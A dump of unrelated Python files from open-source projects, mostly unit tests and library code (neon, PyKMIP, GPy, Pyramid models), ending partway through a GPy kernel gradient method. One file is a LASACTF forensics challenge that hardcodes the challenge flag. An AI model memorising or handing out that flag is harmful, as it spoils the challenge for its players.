test.build(gypfile)
test.must_contain_all_lines(test.stdout(), check_for)
test = TestGyp.TestGyp(formats=['ninja'])
test.formats = ['ninja-my_flavor' if f == 'ninja' else f for f in test.formats]
def TestTargetOverideSharedLib():
expected = ['my_cc.py', 'my_cxx.py', 'FOO']
env = {'CC': 'python %s/my_cc.py FOO' % here,
'CXX': 'python %s/my_cxx.py FOO' % here,
'NM': 'python %s/my_nm.py' % here,
'READELF': 'python %s/my_readelf.py' % here}
with TestGyp.LocalEnv(env):
CheckCompiler(test, 'compiler-shared-lib.gyp', expected, True)
test.must_contain(test.built_file_path('RAN_MY_NM'), 'RAN_MY_NM')
test.must_contain(test.built_file_path('RAN_MY_READELF'), 'RAN_MY_READELF')
test.unlink(test.built_file_path('RAN_MY_NM'))
test.unlink(test.built_file_path('RAN_MY_READELF'))
CheckCompiler(test, 'compiler-shared-lib.gyp', expected, False)
test.must_contain(test.built_file_path('RAN_MY_NM'), 'RAN_MY_NM')
test.must_contain(test.built_file_path('RAN_MY_READELF'), 'RAN_MY_READELF')
TestTargetOverideSharedLib()
test.pass_test()
|
data/JetBrains/python-skeletons/numpy/core/__init__.py
|
from . import multiarray
__all__ = []
|
data/NervanaSystems/neon/tests/test_pool_layer.py
|
"""
Pooling layer tests
"""
import itertools as itt
import numpy as np
from neon import NervanaObject
from neon.layers.layer import Pooling
from tests.utils import allclose_with_out
def pytest_generate_tests(metafunc):
np.random.seed(1)
if metafunc.config.option.all:
bsz_rng = [32, 64]
else:
bsz_rng = [128]
if 'poolargs' in metafunc.fixturenames:
fargs = []
if metafunc.config.option.all:
fs_rng = [2, 3, 5]
pad_rng = [0, 1]
nifm_rng = [16, 32]
in_sz_rng = [8, 16]
else:
fs_rng = [2, 4]
pad_rng = [0, 1]
nifm_rng = [8]
in_sz_rng = [8]
fargs_ = []
for fs in fs_rng:
stride_rng = set([1, fs/2, fs])
fargs_.append(itt.product(fs_rng, nifm_rng, pad_rng, stride_rng, in_sz_rng, bsz_rng))
fargs = itt.chain(*fargs_)
metafunc.parametrize('poolargs', fargs)
def ref_pooling(inp, inp_shape, fshape, padding, strides, be, ncheck=None):
inp_lshape = list(inp_shape)
bsz = inp.shape[-1]
if ncheck is None:
check_inds = np.arange(bsz)
elif type(ncheck) is int:
check_inds = np.random.permutation(bsz)
check_inds = check_inds[0:ncheck]
else:
check_inds = ncheck
check_inds = np.sort(check_inds)
inp_lshape.append(bsz)
inpa = inp.get().reshape(inp_lshape)
outshape = (inp_lshape[0],
be.output_dim(inp_lshape[1], fshape[0], padding, strides[0], pooling=True),
be.output_dim(inp_lshape[2], fshape[1], padding, strides[1], pooling=True),
len(check_inds))
if padding > 0:
padded_shape = (inp_lshape[0],
inp_lshape[1]+2*padding,
inp_lshape[2]+2*padding,
inp_lshape[-1])
inp_pad = np.zeros(padded_shape)
inp_pad[:, padding:-padding, padding:-padding, :] = inpa[:, 0:, 0:, :]
else:
inp_pad = inpa
out_exp = np.zeros(outshape)
for indC in range(outshape[0]):
for indh in range(outshape[1]):
hrng = (indh*strides[0], indh*strides[0] + fshape[0])
for indw in range(outshape[2]):
wrng = (indw*strides[1], indw*strides[1] + fshape[1])
for cnt, indb in enumerate(check_inds):
inp_check = inp_pad[indC, hrng[0]:hrng[1], wrng[0]:wrng[1], indb]
out_exp[indC, indh, indw, cnt] = np.max(inp_check)
return (out_exp, check_inds)
def test_padding(backend_default, poolargs):
fshape, nifm, padding, stride, in_sz, batch_size = poolargs
NervanaObject.be.bsz = batch_size
inshape = (nifm, in_sz, in_sz)
insize = np.prod(inshape)
neon_layer = Pooling(fshape=fshape, strides=stride, padding=padding)
inp = neon_layer.be.array(np.random.random((insize, batch_size)))
inp.lshape = inshape
neon_layer.configure(inshape)
neon_layer.prev_layer = True
neon_layer.allocate()
neon_layer.set_deltas([neon_layer.be.iobuf(inshape)])
out = neon_layer.fprop(inp).get()
ncheck = [0, batch_size/2, batch_size-1]
(out_exp, check_inds) = ref_pooling(inp, inp.lshape,
(fshape, fshape),
padding,
(stride, stride),
neon_layer.be,
ncheck=ncheck)
out_shape = list(out_exp.shape[0:3])
out_shape.append(batch_size)
outa = out.reshape(out_shape)
assert allclose_with_out(out_exp, outa[:, :, :, check_inds], atol=0.0, rtol=0.0)
|
data/OpenKMIP/PyKMIP/kmip/tests/unit/core/messages/payloads/test_discover_versions.py
|
from six.moves import xrange
from testtools import TestCase
from kmip.core import utils
from kmip.core.messages.contents import ProtocolVersion
from kmip.core.messages.payloads import discover_versions
class TestDiscoverVersionsRequestPayload(TestCase):
def setUp(self):
super(TestDiscoverVersionsRequestPayload, self).setUp()
self.protocol_versions_empty = list()
self.protocol_versions_one = list()
self.protocol_versions_one.append(ProtocolVersion.create(1, 0))
self.protocol_versions_two = list()
self.protocol_versions_two.append(ProtocolVersion.create(1, 1))
self.protocol_versions_two.append(ProtocolVersion.create(1, 0))
self.encoding_empty = utils.BytearrayStream((
b'\x42\x00\x79\x01\x00\x00\x00\x00'))
self.encoding_one = utils.BytearrayStream((
b'\x42\x00\x79\x01\x00\x00\x00\x28\x42\x00\x69\x01\x00\x00\x00\x20'
b'\x42\x00\x6A\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
b'\x42\x00\x6B\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00'
b'\x00'))
self.encoding_two = utils.BytearrayStream((
b'\x42\x00\x79\x01\x00\x00\x00\x50\x42\x00\x69\x01\x00\x00\x00\x20'
b'\x42\x00\x6A\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
b'\x42\x00\x6B\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
b'\x42\x00\x69\x01\x00\x00\x00\x20\x42\x00\x6A\x02\x00\x00\x00\x04'
b'\x00\x00\x00\x01\x00\x00\x00\x00\x42\x00\x6B\x02\x00\x00\x00\x04'
b'\x00\x00\x00\x00\x00\x00\x00\x00'))
def tearDown(self):
super(TestDiscoverVersionsRequestPayload, self).tearDown()
def test_init_with_none(self):
discover_versions.DiscoverVersionsRequestPayload()
def test_init_with_args(self):
discover_versions.DiscoverVersionsRequestPayload(
self.protocol_versions_empty)
def test_validate_with_invalid_protocol_versions(self):
kwargs = {'protocol_versions': 'invalid'}
self.assertRaisesRegexp(
TypeError, "invalid protocol versions list",
discover_versions.DiscoverVersionsRequestPayload, **kwargs)
def test_validate_with_invalid_protocol_version(self):
kwargs = {'protocol_versions': ['invalid']}
self.assertRaisesRegexp(
TypeError, "invalid protocol version",
discover_versions.DiscoverVersionsRequestPayload, **kwargs)
def _test_read(self, stream, payload, protocol_versions):
payload.read(stream)
expected = len(protocol_versions)
observed = len(payload.protocol_versions)
msg = "protocol versions list decoding mismatch"
msg += "; expected {0} results, received {1}".format(
expected, observed)
self.assertEqual(expected, observed, msg)
for i in xrange(len(protocol_versions)):
expected = protocol_versions[i]
observed = payload.protocol_versions[i]
msg = "protocol version decoding mismatch"
msg += "; expected {0}, received {1}".format(expected, observed)
self.assertEqual(expected, observed, msg)
def test_read_with_empty_protocol_list(self):
stream = self.encoding_empty
payload = discover_versions.DiscoverVersionsRequestPayload()
protocol_versions = self.protocol_versions_empty
self._test_read(stream, payload, protocol_versions)
def test_read_with_one_protocol_version(self):
stream = self.encoding_one
payload = discover_versions.DiscoverVersionsRequestPayload()
protocol_versions = self.protocol_versions_one
self._test_read(stream, payload, protocol_versions)
def test_read_with_two_protocol_versions(self):
stream = self.encoding_two
payload = discover_versions.DiscoverVersionsRequestPayload()
protocol_versions = self.protocol_versions_two
self._test_read(stream, payload, protocol_versions)
def _test_write(self, payload, expected):
stream = utils.BytearrayStream()
payload.write(stream)
length_expected = len(expected)
length_received = len(stream)
msg = "encoding lengths not equal"
msg += "; expected {0}, received {1}".format(
length_expected, length_received)
self.assertEqual(length_expected, length_received, msg)
msg = "encoding mismatch"
msg += ";\nexpected:\n{0}\nreceived:\n{1}".format(expected, stream)
self.assertEqual(expected, stream, msg)
def test_write_with_empty_protocol_list(self):
payload = discover_versions.DiscoverVersionsRequestPayload(
self.protocol_versions_empty)
expected = self.encoding_empty
self._test_write(payload, expected)
def test_write_with_one_protocol_version(self):
payload = discover_versions.DiscoverVersionsRequestPayload(
self.protocol_versions_one)
expected = self.encoding_one
self._test_write(payload, expected)
def test_write_with_two_protocol_versions(self):
payload = discover_versions.DiscoverVersionsRequestPayload(
self.protocol_versions_two)
expected = self.encoding_two
self._test_write(payload, expected)
class TestDiscoverVersionsResponsePayload(TestCase):
def setUp(self):
super(TestDiscoverVersionsResponsePayload, self).setUp()
self.protocol_versions_empty = list()
self.protocol_versions_one = list()
self.protocol_versions_one.append(ProtocolVersion.create(1, 0))
self.protocol_versions_two = list()
self.protocol_versions_two.append(ProtocolVersion.create(1, 1))
self.protocol_versions_two.append(ProtocolVersion.create(1, 0))
self.encoding_empty = utils.BytearrayStream((
b'\x42\x00\x7C\x01\x00\x00\x00\x00'))
self.encoding_one = utils.BytearrayStream((
b'\x42\x00\x7C\x01\x00\x00\x00\x28\x42\x00\x69\x01\x00\x00\x00\x20'
b'\x42\x00\x6A\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
b'\x42\x00\x6B\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00'
b'\x00'))
self.encoding_two = utils.BytearrayStream((
b'\x42\x00\x7C\x01\x00\x00\x00\x50\x42\x00\x69\x01\x00\x00\x00\x20'
b'\x42\x00\x6A\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
b'\x42\x00\x6B\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
b'\x42\x00\x69\x01\x00\x00\x00\x20\x42\x00\x6A\x02\x00\x00\x00\x04'
b'\x00\x00\x00\x01\x00\x00\x00\x00\x42\x00\x6B\x02\x00\x00\x00\x04'
b'\x00\x00\x00\x00\x00\x00\x00\x00'))
def tearDown(self):
super(TestDiscoverVersionsResponsePayload, self).tearDown()
def test_init_with_none(self):
discover_versions.DiscoverVersionsResponsePayload()
def test_init_with_args(self):
discover_versions.DiscoverVersionsResponsePayload(
self.protocol_versions_empty)
def test_validate_with_invalid_protocol_versions(self):
kwargs = {'protocol_versions': 'invalid'}
self.assertRaisesRegexp(
TypeError, "invalid protocol versions list",
discover_versions.DiscoverVersionsResponsePayload, **kwargs)
def test_validate_with_invalid_protocol_version(self):
kwargs = {'protocol_versions': ['invalid']}
self.assertRaisesRegexp(
TypeError, "invalid protocol version",
discover_versions.DiscoverVersionsResponsePayload, **kwargs)
def _test_read(self, stream, payload, protocol_versions):
payload.read(stream)
expected = len(protocol_versions)
observed = len(payload.protocol_versions)
msg = "protocol versions list decoding mismatch"
msg += "; expected {0} results, received {1}".format(
expected, observed)
self.assertEqual(expected, observed, msg)
for i in xrange(len(protocol_versions)):
expected = protocol_versions[i]
observed = payload.protocol_versions[i]
msg = "protocol version decoding mismatch"
msg += "; expected {0}, received {1}".format(expected, observed)
self.assertEqual(expected, observed, msg)
def test_read_with_empty_protocol_list(self):
stream = self.encoding_empty
payload = discover_versions.DiscoverVersionsResponsePayload()
protocol_versions = self.protocol_versions_empty
self._test_read(stream, payload, protocol_versions)
def test_read_with_one_protocol_version(self):
stream = self.encoding_one
payload = discover_versions.DiscoverVersionsResponsePayload()
protocol_versions = self.protocol_versions_one
self._test_read(stream, payload, protocol_versions)
def test_read_with_two_protocol_versions(self):
stream = self.encoding_two
payload = discover_versions.DiscoverVersionsResponsePayload()
protocol_versions = self.protocol_versions_two
self._test_read(stream, payload, protocol_versions)
def _test_write(self, payload, expected):
stream = utils.BytearrayStream()
payload.write(stream)
length_expected = len(expected)
length_received = len(stream)
msg = "encoding lengths not equal"
msg += "; expected {0}, received {1}".format(
length_expected, length_received)
self.assertEqual(length_expected, length_received, msg)
msg = "encoding mismatch"
msg += ";\nexpected:\n{0}\nreceived:\n{1}".format(expected, stream)
self.assertEqual(expected, stream, msg)
def test_write_with_empty_protocol_list(self):
payload = discover_versions.DiscoverVersionsResponsePayload(
self.protocol_versions_empty)
expected = self.encoding_empty
self._test_write(payload, expected)
def test_write_with_one_protocol_version(self):
payload = discover_versions.DiscoverVersionsResponsePayload(
self.protocol_versions_one)
expected = self.encoding_one
self._test_write(payload, expected)
def test_write_with_two_protocol_versions(self):
payload = discover_versions.DiscoverVersionsResponsePayload(
self.protocol_versions_two)
expected = self.encoding_two
self._test_write(payload, expected)
|
data/ProgVal/Limnoria/plugins/Owner/__init__.py
|
"""
Provides commands useful to the owner of the bot; the commands here require
their caller to have the 'owner' capability. This plugin is loaded by default.
"""
import supybot
import supybot.world as world
__version__ = "%%VERSION%%"
__author__ = supybot.authors.jemfinch
__contributors__ = {}
from . import config
from . import plugin
from imp import reload
reload(plugin)
if world.testing:
from . import test
Class = plugin.Class
configure = config.configure
|
data/SmartTeleMax/iktomi/tests/storage.py
|
__all__ = ['LocalMemStorageTest', 'MemcachedStorageTest']
import unittest
from iktomi.storage import LocalMemStorage, MemcachedStorage
class LocalMemStorageTest(unittest.TestCase):
def test_set(self):
'`LocalMemStorage` set method'
s = LocalMemStorage()
s.set('key', 'value')
self.assertEqual(s.storage['key'], 'value')
def test_set_rewrite(self):
'`LocalMemStorage` set method of existing key'
s = LocalMemStorage()
s.set('key', 'value')
s.set('key', 'value1')
self.assertEqual(s.storage['key'], 'value1')
def test_get(self):
'`LocalMemStorage` get method'
s = LocalMemStorage()
self.assertEqual(s.get('key'), None)
self.assertEqual(s.get('key', '1'), '1')
s.set('key', 'value')
self.assertEqual(s.get('key'), 'value')
def test_delete(self):
'`LocalMemStorage` delete method'
s = LocalMemStorage()
self.assertEqual(s.delete('key'), True)
s.set('key', 'value')
self.assertEqual(s.delete('key'), True)
self.assertEqual(s.get('key'), None)
class MemcachedStorageTest(unittest.TestCase):
def setUp(self):
self.storage = MemcachedStorage('localhost:11211')
if not self.storage.storage.set('test', 'test'):
raise Exception('memcached is down')
def tearDown(self):
memcached = self.storage.storage
memcached.delete('test')
memcached.delete('key')
memcached.disconnect_all()
def test_set(self):
'`MemcachedStorage` set method'
self.assertEqual(self.storage.set('key', 'value'), True)
self.assertEqual(self.storage.set('key', 'value1'), True)
def test_get(self):
'`MemcachedStorage` get method'
self.assertEqual(self.storage.get('key'), None)
self.assertEqual(self.storage.get('key', 'default'), 'default')
self.storage.set('key', 'value')
self.assertEqual(self.storage.get('key'), 'value')
def test_delete(self):
'`MemcachedStorage` delete method'
self.assertEqual(self.storage.delete('key'), True)
self.storage.set('key', 'value')
self.assertEqual(self.storage.delete('key'), True)
self.assertEqual(self.storage.get('key'), None)
|
data/MongoEngine/django-mongoengine/django_mongoengine/mongo_admin/templatetags/mongoadmintags.py
|
from django import template
from django.conf import settings
register = template.Library()
class CheckGrappelli(template.Node):
def __init__(self, var_name):
self.var_name = var_name
def render(self, context):
context[self.var_name] = 'grappelli' in settings.INSTALLED_APPS
return ''
def check_grappelli(parser, token):
"""
Checks weather grappelli is in installed apps and sets a variable in the context.
Unfortunately there is no other way to find out if grappelli is used or not.
See: https://github.com/sehmaschine/django-grappelli/issues/32
Usage: {% check_grappelli as <varname> %}
"""
bits = token.contents.split()
if len(bits) != 3:
raise template.TemplateSyntaxError("'check_grappelli' tag takes exactly two arguments.")
if bits[1] != 'as':
raise template.TemplateSyntaxError("The second argument to 'check_grappelli' must be 'as'")
varname = bits[2]
return CheckGrappelli(varname)
register.tag(check_grappelli)
|
data/VinF/deer/setup.py
|
from setuptools import setup, find_packages
import deer
NAME = 'deer'
VERSION = '0.1'
AUTHOR = "Vincent Francois-Lavet"
AUTHOR_EMAIL = "v.francois@ulg.ac.be"
URL = 'https://github.com/VinF/General_Deep_Q_RL'
DESCRIPTION = 'Framework for deep reinforcement learning'
with open('README.md') as f:
LONG_DESCRIPTION = f.read()
CLASSIFIERS = [
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Scientific/Engineering',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries',
]
if __name__ == '__main__':
setup(name=NAME,
version=VERSION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
url=URL,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
license='BSD',
classifiers=CLASSIFIERS,
platforms='any',
packages=find_packages())
|
data/Pylons/shootout/shootout/models.py
|
import cryptacular.bcrypt
from sqlalchemy import (
Table,
Column,
ForeignKey,
)
from sqlalchemy.orm import (
scoped_session,
sessionmaker,
relation,
backref,
column_property,
synonym,
joinedload,
)
from sqlalchemy.types import (
Integer,
Unicode,
UnicodeText,
)
from sqlalchemy.sql import func
from sqlalchemy.ext.declarative import declarative_base
from zope.sqlalchemy import ZopeTransactionExtension
from pyramid.security import (
Everyone,
Authenticated,
Allow,
)
DBSession = scoped_session(sessionmaker(extension=ZopeTransactionExtension()))
Base = declarative_base()
crypt = cryptacular.bcrypt.BCRYPTPasswordManager()
def hash_password(password):
return unicode(crypt.encode(password))
class User(Base):
"""
Application's user model.
"""
__tablename__ = 'users'
user_id = Column(Integer, primary_key=True)
username = Column(Unicode(20), unique=True)
name = Column(Unicode(50))
email = Column(Unicode(50))
hits = Column(Integer, default=0)
misses = Column(Integer, default=0)
delivered_hits = Column(Integer, default=0)
delivered_misses = Column(Integer, default=0)
_password = Column('password', Unicode(60))
def _get_password(self):
return self._password
def _set_password(self, password):
self._password = hash_password(password)
password = property(_get_password, _set_password)
password = synonym('_password', descriptor=password)
def __init__(self, username, password, name, email):
self.username = username
self.name = name
self.email = email
self.password = password
@classmethod
def get_by_username(cls, username):
return DBSession.query(cls).filter(cls.username == username).first()
@classmethod
def check_password(cls, username, password):
user = cls.get_by_username(username)
if not user:
return False
return crypt.check(user.password, password)
ideas_tags = Table('ideas_tags', Base.metadata,
Column('idea_id', Integer, ForeignKey('ideas.idea_id')),
Column('tag_id', Integer, ForeignKey('tags.tag_id'))
)
class Tag(Base):
"""
Idea's tag model.
"""
__tablename__ = 'tags'
tag_id = Column(Integer, primary_key=True)
name = Column(Unicode(50), unique=True, index=True)
def __init__(self, name):
self.name = name
@staticmethod
def extract_tags(tags_string):
tags = tags_string.replace(';', ' ').replace(',', ' ')
tags = [tag.lower() for tag in tags.split()]
tags = set(tags)
return tags
@classmethod
def get_by_name(cls, tag_name):
tag = DBSession.query(cls).filter(cls.name == tag_name)
return tag.first()
@classmethod
def create_tags(cls, tags_string):
tags_list = cls.extract_tags(tags_string)
tags = []
for tag_name in tags_list:
tag = cls.get_by_name(tag_name)
if not tag:
tag = Tag(name=tag_name)
DBSession.add(tag)
tags.append(tag)
return tags
@classmethod
def tag_counts(cls):
query = DBSession.query(Tag.name, func.count('*'))
return query.join('ideas').group_by(Tag.name)
voted_users = Table('ideas_votes', Base.metadata,
Column('idea_id', Integer, ForeignKey('ideas.idea_id')),
Column('user_id', Integer, ForeignKey('users.user_id'))
)
class Idea(Base):
__tablename__ = 'ideas'
idea_id = Column(Integer, primary_key=True)
target_id = Column(Integer, ForeignKey('ideas.idea_id'))
comments = relation('Idea', cascade="delete",
backref=backref('target', remote_side=idea_id))
author_id = Column(Integer, ForeignKey('users.user_id'))
author = relation(User, cascade="delete", backref='ideas')
title = Column(UnicodeText)
text = Column(UnicodeText)
hits = Column(Integer, default=0)
misses = Column(Integer, default=0)
tags = relation(Tag, secondary=ideas_tags, backref='ideas')
voted_users = relation(User, secondary=voted_users, lazy='dynamic',
backref='voted_ideas')
hit_percentage = func.coalesce(hits / (hits + misses) * 100, 0)
hit_percentage = column_property(hit_percentage.label('hit_percentage'))
total_votes = column_property((hits + misses).label('total_votes'))
vote_differential = column_property(
(hits - misses).label('vote_differential')
)
@classmethod
def get_query(cls, with_joinedload=True):
query = DBSession.query(cls)
if with_joinedload:
query = query.options(joinedload('tags'), joinedload('author'))
return query
@classmethod
def get_by_id(cls, idea_id, with_joinedload=True):
query = cls.get_query(with_joinedload)
return query.filter(cls.idea_id == idea_id).first()
@classmethod
def get_by_tagname(cls, tag_name, with_joinedload=True):
query = cls.get_query(with_joinedload)
return query.filter(Idea.tags.any(name=tag_name))
@classmethod
def ideas_bunch(cls, order_by, how_many=10, with_joinedload=True):
query = cls.get_query(with_joinedload).join('author')
query = query.filter(cls.target == None).order_by(order_by)
return query.limit(how_many).all()
def user_voted(self, username):
return bool(self.voted_users.filter_by(username=username).first())
def vote(self, user, positive):
if positive:
self.hits += 1
self.author.hits += 1
user.delivered_hits += 1
else:
self.misses += 1
self.author.misses += 1
user.delivered_misses += 1
self.voted_users.append(user)
class RootFactory(object):
__acl__ = [
(Allow, Everyone, 'view'),
(Allow, Authenticated, 'post')
]
def __init__(self, request):
pass
|
data/achillean/shodan-python/shodan/cli/converter/__init__.py
|
from .csvc import *
from .kml import *
|
data/LASACTF/LASACTF-Problems/Problems/Forensics/Rise-of-the-machines/challenge.py
|
from hacksport.problem import Challenge
class Problem(Challenge):
def setup(self):
self.flag = '2b7639993c09f171d4c524b4433fc43d269b5a3af36be9caebb3ebf4a142200944bae1'
|
data/SheffieldML/GPy/GPy/kern/src/periodic.py
|
import numpy as np
from .kern import Kern
from ...util.linalg import mdot
from ...util.decorators import silence_errors
from ...core.parameterization.param import Param
from paramz.transformations import Logexp
class Periodic(Kern):
def __init__(self, input_dim, variance, lengthscale, period, n_freq, lower, upper, active_dims, name):
"""
:type input_dim: int
:param variance: the variance of the Matern kernel
:type variance: float
:param lengthscale: the lengthscale of the Matern kernel
:type lengthscale: np.ndarray of size (input_dim,)
:param period: the period
:type period: float
:param n_freq: the number of frequencies considered for the periodic subspace
:type n_freq: int
:rtype: kernel object
"""
assert input_dim==1, "Periodic kernels are only defined for input_dim=1"
super(Periodic, self).__init__(input_dim, active_dims, name)
self.input_dim = input_dim
self.lower,self.upper = lower, upper
self.n_freq = n_freq
self.n_basis = 2*n_freq
self.variance = Param('variance', np.float64(variance), Logexp())
self.lengthscale = Param('lengthscale', np.float64(lengthscale), Logexp())
self.period = Param('period', np.float64(period), Logexp())
self.link_parameters(self.variance, self.lengthscale, self.period)
def _cos(self, alpha, omega, phase):
def f(x):
return alpha*np.cos(omega*x + phase)
return f
@silence_errors
def _cos_factorization(self, alpha, omega, phase):
r1 = np.sum(alpha*np.cos(phase),axis=1)[:,None]
r2 = np.sum(alpha*np.sin(phase),axis=1)[:,None]
r = np.sqrt(r1**2 + r2**2)
psi = np.where(r1 != 0, (np.arctan(r2/r1) + (r1<0.)*np.pi),np.arcsin(r2))
return r,omega[:,0:1], psi
@silence_errors
def _int_computation(self,r1,omega1,phi1,r2,omega2,phi2):
Gint1 = 1./(omega1+omega2.T)*( np.sin((omega1+omega2.T)*self.upper+phi1+phi2.T) - np.sin((omega1+omega2.T)*self.lower+phi1+phi2.T)) + 1./(omega1-omega2.T)*( np.sin((omega1-omega2.T)*self.upper+phi1-phi2.T) - np.sin((omega1-omega2.T)*self.lower+phi1-phi2.T) )
Gint2 = 1./(omega1+omega2.T)*( np.sin((omega1+omega2.T)*self.upper+phi1+phi2.T) - np.sin((omega1+omega2.T)*self.lower+phi1+phi2.T)) + np.cos(phi1-phi2.T)*(self.upper-self.lower)
Gint = np.dot(r1,r2.T)/2 * np.where(np.isnan(Gint1),Gint2,Gint1)
return Gint
def K(self, X, X2=None):
FX = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X)
if X2 is None:
FX2 = FX
else:
FX2 = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X2)
return mdot(FX,self.Gi,FX2.T)
def Kdiag(self,X):
return np.diag(self.K(X))
class PeriodicExponential(Periodic):
"""
Kernel of the periodic subspace (up to a given frequency) of a exponential
(Matern 1/2) RKHS.
Only defined for input_dim=1.
"""
def __init__(self, input_dim=1, variance=1., lengthscale=1., period=2.*np.pi, n_freq=10, lower=0., upper=4*np.pi, active_dims=None, name='periodic_exponential'):
super(PeriodicExponential, self).__init__(input_dim, variance, lengthscale, period, n_freq, lower, upper, active_dims, name)
def parameters_changed(self):
self.a = [1./self.lengthscale, 1.]
self.b = [1]
self.basis_alpha = np.ones((self.n_basis,))
self.basis_omega = (2*np.pi*np.arange(1,self.n_freq+1)/self.period).repeat(2)
self.basis_phi = np.zeros(self.n_freq * 2)
self.basis_phi[::2] = -np.pi/2
self.G = self.Gram_matrix()
self.Gi = np.linalg.inv(self.G)
def Gram_matrix(self):
La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)),self.a[1]*self.basis_omega))
Lo = np.column_stack((self.basis_omega,self.basis_omega))
Lp = np.column_stack((self.basis_phi,self.basis_phi+np.pi/2))
r,omega,phi = self._cos_factorization(La,Lo,Lp)
Gint = self._int_computation( r,omega,phi, r,omega,phi)
Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
return(self.lengthscale/(2*self.variance) * Gint + 1./self.variance*np.dot(Flower,Flower.T))
@silence_errors
def update_gradients_full(self, dL_dK, X, X2=None):
"""derivative of the covariance matrix with respect to the parameters (shape is N x num_inducing x num_params)"""
if X2 is None: X2 = X
FX = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X)
FX2 = self._cos(self.basis_alpha[None,:],self.basis_omega[None,:],self.basis_phi[None,:])(X2)
La = np.column_stack((self.a[0]*np.ones((self.n_basis,1)),self.a[1]*self.basis_omega))
Lo = np.column_stack((self.basis_omega,self.basis_omega))
Lp = np.column_stack((self.basis_phi,self.basis_phi+np.pi/2))
r,omega,phi = self._cos_factorization(La,Lo,Lp)
Gint = self._int_computation( r,omega,phi, r,omega,phi)
Flower = np.array(self._cos(self.basis_alpha,self.basis_omega,self.basis_phi)(self.lower))[:,None]
dK_dvar = 1./self.variance*mdot(FX,self.Gi,FX2.T)
da_dlen = [-1./self.lengthscale**2,0.]
dLa_dlen = np.column_stack((da_dlen[0]*np.ones((self.n_basis,1)),da_dlen[1]*self.basis_omega))
r1,omega1,phi1 = self._cos_factorization(dLa_dlen,Lo,Lp)
dGint_dlen = self._int_computation(r1,omega1,phi1, r,omega,phi)
dGint_dlen = dGint_dlen + dGint_dlen.T
dG_dlen = 1./2*Gint + self.lengthscale/2*dGint_dlen
dK_dlen = -mdot(FX,self.Gi,dG_dlen/self.variance,self.Gi,FX2.T)
dFX_dper = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X ,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X)
dFX2_dper = self._cos(-self.basis_alpha[None,:]*self.basis_omega[None,:]/self.period*X2,self.basis_omega[None,:],self.basis_phi[None,:]+np.pi/2)(X2)
dLa_dper = np.column_stack((-self.a[0]*self.basis_omega/self.period, -self.a[1]*self.basis_omega**2/self.period))
dLp_dper = np.column_stack((self.basis_phi+np.pi/2,self.basis_phi+np.pi))
r1,omega1,phi1 = self._cos_factorization(dLa_dper,Lo,dLp_dper)
IPPprim1 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi/2))
IPPprim1 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + 1./(omega-omega1.T)*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi/2))
IPPprim2 = self.upper*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi/2) + self.upper*np.cos(phi-phi1.T))
IPPprim2 -= self.lower*(1./(omega+omega1.T)*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi/2) + self.lower*np.cos(phi-phi1.T))
IPPprim = np.where(np.logical_or(np.isnan(IPPprim1), np.isinf(IPPprim1)), IPPprim2, IPPprim1)
IPPint1 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.upper+phi-phi1.T-np.pi)
IPPint1 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./(omega-omega1.T)**2*np.cos((omega-omega1.T)*self.lower+phi-phi1.T-np.pi)
IPPint2 = 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.upper+phi+phi1.T-np.pi) + 1./2*self.upper**2*np.cos(phi-phi1.T)
IPPint2 -= 1./(omega+omega1.T)**2*np.cos((omega+omega1.T)*self.lower+phi+phi1.T-np.pi) + 1./2*self.lower**2*np.cos(phi-phi1.T)
IPPint = np.where(np.isnan(IPPint1),IPPint2,IPPint1)
dLa_dper2 = np.column_stack((-self.a[1]*self.basis_omega/self.period))
dLp_dper2 = np.column_stack((self.basis_phi+np.pi/2))
r2,omega2,phi2 = dLa_dper2.T,Lo[:,0:1],dLp_dper2.T
dGint_dper = np.dot(r,r1.T)/2 * (IPPprim - IPPint) + self._int_computation(r2,omega2,phi2, r,omega,phi)
dGint_dper = dGint_dper + dGint_dper.T
dFlower_dper = np.array(self._cos(-self.lower*self.basis_alpha*self.basis_omega/self.period,self.basis_omega,self.basis_phi+np.pi/2)(self.lower))[:,None]
dG_dper = 1./self.variance*(self.lengthscale/2*dGint_dper + self.b[0]*(np.dot(dFlower_dper,Flower.T)+np.dot(Flower,dFlower_dper.T)))
